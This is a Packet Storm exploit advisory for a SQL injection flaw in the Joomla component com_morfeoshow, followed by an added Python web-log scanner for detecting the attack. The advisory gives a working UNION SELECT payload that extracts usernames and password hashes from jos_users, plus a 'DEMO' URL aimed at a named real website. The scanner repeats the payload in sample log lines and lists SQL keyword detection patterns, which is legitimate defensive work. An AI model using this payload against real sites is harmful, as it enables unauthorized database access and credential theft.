Joomla Morfeoshow SQL Injection

2011-06-27T00:00:00
ID PACKETSTORM:102596
Type packetstorm
Reporter Th3.xin0x
Modified 2011-06-27T00:00:00

Description

                                        
`#############################################################  
Joomla Component com_morfeoshow SQL Injection Vulnerability  
#############################################################  
  
  
# Author : Th3.xin0x  
  
# Greetz : P0fk - ksha - S[e]C -seth - pks - xacks - OzX All My Friends :)  
  
# special thanks to: www.mitm.cl - https://foro.undersecurity.net  
  
# Name : Joomla com_morfeoshow  
  
# Bug Type : SQL injection  
  
  
  
+--+ Example:  
site.com/index.php?option=com_morfeoshow&task=view&gallery=1&Itemid=114&Itemid=114&idm=  
  
  
+--+ EXPLOIT :  
+and+1=0+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+jos_users+--+  
  
  
+--+ DEMO :  
  
http://www.ucinf.cl/index.php?option=com_morfeoshow&task=view&gallery=1&Itemid=114&Itemid=114&idm=1015+and+1=0+union+select+1,2,concat%28username,0x3a,password%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+jos_users+--+  
  
  
[2011-06-26]  
`
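
For defenders reviewing web-server logs, the following is an added example (not part of the original advisory) that flags com_morfeoshow requests whose `idm` parameter is not a plain integer, including when the parameter is repeated or URL-encoded. The log lines, IP addresses and the assumption that `idm` is always a numeric id (as the value 1015 in the advisory suggests) are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines (combined log format); addresses are documentation-range placeholders.
SAMPLE_LOG = """\
192.0.2.10 - - [26/Jun/2011:10:00:01 +0000] "GET /index.php?option=com_morfeoshow&task=view&gallery=1&Itemid=114&idm=1015 HTTP/1.1" 200 5120
192.0.2.44 - - [26/Jun/2011:10:02:13 +0000] "GET /index.php?option=com_morfeoshow&task=view&gallery=1&Itemid=114&Itemid=114&idm=1015+and+1=0+union+select+1,2,concat%28username,0x3a,password%29,4+from+jos_users+--+ HTTP/1.1" 200 7311
192.0.2.45 - - [26/Jun/2011:10:03:40 +0000] "GET /index.php?option=com_content&view=article&id=7 HTTP/1.1" 200 4096
192.0.2.46 - - [26/Jun/2011:10:04:02 +0000] "GET /index.php?option=com_morfeoshow&task=view&idm=12&idm=12%20UNION%20SELECT%201 HTTP/1.1" 200 900
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')
SQL_HINT_RE = re.compile(r"\b(?:union|select|concat|from)\b|--|0x[0-9a-f]+", re.I)

def suspicious_idm(url):
    """Return the non-integer idm values of a com_morfeoshow request, else []."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    if "com_morfeoshow" not in params.get("option", []):
        return []
    # parse_qs decodes '+' and %xx and keeps every occurrence of a repeated key.
    return [v for v in params.get("idm", []) if v.strip() and not re.fullmatch(r"\d+", v.strip())]

def scan(log_text):
    """Return (client_ip, status, idm_value, sql_tokens) for each flagged request."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        ip, url, status = m.groups()
        for value in suspicious_idm(url):
            tokens = sorted({t.lower() for t in SQL_HINT_RE.findall(value)})
            findings.append((ip, int(status), value, tokens))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The integer check is the primary signal; the SQL token list only helps triage and should not be used as the filter on its own.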